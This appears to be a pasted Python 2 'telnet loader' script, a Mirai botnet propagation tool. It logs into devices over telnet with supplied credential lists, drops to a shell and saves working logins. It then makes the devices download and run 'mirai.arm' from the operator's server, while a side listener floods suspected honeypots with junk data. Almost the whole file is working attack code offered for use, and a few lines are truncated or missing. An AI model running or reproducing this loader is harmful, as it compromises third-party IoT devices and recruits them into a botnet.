

Jan 24th, 2021 (edited)
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  1. #!/usr/bin/python
  2. #Phaaaat hax telnet loader by Freak
  3. import sys, re, os, socket, time, select
  4. from threading import Thread
  5. yourserverip = ""
  6. rekdevice = """paste here""".replace("\r", "").split("\n")
  8. global fh
  9. fh = open("bots.txt","a+")
  11. def chunkify(lst,n):
  12. return [ lst[i::n] for i in xrange(n) ]
  14. running = 0
  16. global echo
  17. global tftp
  18. global wget
  19. global logins
  20. global echoed
  21. echoed = []
  22. tftp = 0
  23. wget = 0
  24. echo = 0
  25. logins = 0
  26. ran = 0
  27. def printStatus():
  28. global echo
  29. global tftp
  30. global wget
  31. global logins
  32. global ran
  33. while 1:
  34. time.sleep(5)
  35. print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + " Ran:" + str(ran) + " Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
  37. def readUntil(tn, advances, timeout=8):
  38. buf = ''
  39. start_time = time.time()
  40. while time.time() - start_time < timeout:
  41. buf += tn.recv(1024)
  42. time.sleep(0.1)
  43. for advance in advances:
  44. if advance in buf: return buf
  45. return ""
  47. def recvTimeout(sock, size, timeout=8):
  48. sock.setblocking(0)
  49. ready =[sock], [], [], timeout)
  50. if ready[0]:
  51. data = sock.recv(size)
  52. return data
  53. return ""
  55. def contains(data, array):
  56. for test in array:
  57. if test in data:
  58. return True
  59. return False
  61. def split_bytes(s, n):
  62. assert n >= 4
  63. start = 0
  64. lens = len(s)
  65. while start < lens:
  66. if lens - start <= n:
  67. yield s[start:]
  68. return # StopIteration
  69. end = start + n
  70. assert end > start
  71. yield s[start:end]
  72. start = end
  73. global badips
  74. global goodips
  75. badips=[]
  76. goodips=[]
  77. def fileread():
  78. fh=open("honeypots.txt", "rb")
  80. fh.close()
  81. return data
  82. def clientHandler(c, addr):
  83. global badips
  84. global goodips
  85. try:
  86. if addr[0] not in badips and addr[0] not in fileread():
  87. print addr[0] + ":" + str(addr[1]) + " has connected!"
  88. request = recvTimeout(c, 8912)
  89. if "curl" not in request and "Wget" not in request:
  90. if addr[0] not in fileread():
  91. fh=open("honeypots.txt", "a")
  92. fh.write(addr[0]+"\n")
  93. fh.close()
  94. badips.append(addr[0])
  95. print addr[0] + ":" + str(addr[1]) + " is a fucking honeypot!!!"
  96. c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
  97. for i in range(10):
  98. c.send(os.urandom(65535*2))
  99. else:
  100. if addr[0] not in goodips:
  101. print addr[0] + ":" + str(addr[1]) + " is a good IP!"
  102. goodips.append(addr[0])
  103. else:
  104. c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
  105. for i in range(10):
  106. c.send(os.urandom(65535*2))
  107. c.close()
  108. except Exception as e:
  109. #print str(e)
  110. pass
  112. def honeyserver():
  113. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  114. s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  115. s.bind(('', 8081))
  116. s.listen(999999999)
  117. while 1:
  118. try:
  119. c, addr = s.accept()
  120. Thread(target=clientHandler, args=(c, addr,)).start()
  121. except:
  122. pass
  124. Thread(target=honeyserver, args=()).start()
  125. def infect(ip, username, password):
  126. global badips
  127. global goodips
  128. global echo
  129. global tftp
  130. global wget
  131. global logins
  132. global ran
  133. global echoed
  134. if ip in echoed:
  135. return
  136. infectedkey = "bigB04t"
  137. try:
  138. tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  139. tn.settimeout(1)
  140. tn.connect((ip, 23))
  141. except:
  142. try:
  143. tn.close()
  144. except:
  145. pass
  146. return
  147. try:
  148. hoho = ''
  149. hoho += readUntil(tn, ":")
  150. if ":" in hoho:
  151. tn.send(username + "\n")
  152. time.sleep(0.1)
  153. hoho = ''
  154. hoho += readUntil(tn, ":")
  155. if ":" in hoho:
  156. tn.send(password + "\n")
  157. time.sleep(0.8)
  158. else:
  159. pass
  160. prompt = ''
  161. prompt += recvTimeout(tn, 8192)
  162. if ">" in prompt and "ONT" not in prompt:
  163. success = True
  164. elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
  165. success = True
  166. else:
  167. tn.close()
  168. return
  169. except:
  170. tn.close()
  171. return
  172. if success == True:
  173. try:
  174. tn.send("enable\r\n")
  175. tn.send("system\r\n")
  176. tn.send("shell\r\n")
  177. tn.send("sh\r\n")
  178. tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
  179. except:
  180. tn.close()
  181. return
  182. time.sleep(1)
  183. try:
  184. buf = recvTimeout(tn, 8192)
  185. except:
  186. tn.close()
  187. return
  188. try:
  189. if "AK47" in buf:
  190. logins += 1
  191. fh.write(ip + ":23 " + username + ":" + password + "\n")
  192. fh.flush()
  193. tn.send("wget http://" + yourserverip + "/mirai.arm &\r\n");
  194. tn.send("curl http://" + yourserverip + ":8081/mirai.arm &\r\n");
  195. time.sleep(3)
  196. recvTimeout(tn, 8192)
  197. if ip in goodips:
  198. tn.send(rekdevice)
  199. tn.close()
  200. except Exception as e:
  201. #print str(e)
  202. pass
  204. else:
  205. # tn.close()
  206. return
  208. def check(chunk, fh):
  209. global running
  210. running += 1
  211. threadID = running
  212. for login in chunk:
  213. try:
  214. if ":23 " in login:
  215. login = login.replace(":23 ", ":")
  216. port = 23
  217. if ":2323 " in login:
  218. login = login.replace(":2323 ", ":")
  219. port = 2323
  220. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  221. s.settimeout(1)
  222. try:
  223. socket.inet_aton(login.split(":")[0])
  224. ip = login.split(":")[0]
  225. username = login.split(":")[1]
  226. password = login.split(":")[2]
  227. except:
  228. try:
  229. socket.inet_aton(login.split(":")[2])
  230. ip = login.split(":")[2]
  231. username = login.split(":")[0]
  232. password = login.split(":")[1]
  233. except:
  234. continue
  235. s.connect((ip, port))
  236. s.close()
  237. infect(ip, username, password)
  238. except:
  239. pass
  240. running -= 1
  241. while 1:
  242. try:
  243. while running >= 256:
  244. time.sleep(0.3)
  245. Thread(target = check, args = ([raw_input()], fh,)).start()
  246. except KeyboardInterrupt:
  247. os.kill(os.getpid(), 9)
  248. except Exception:
  249. pass
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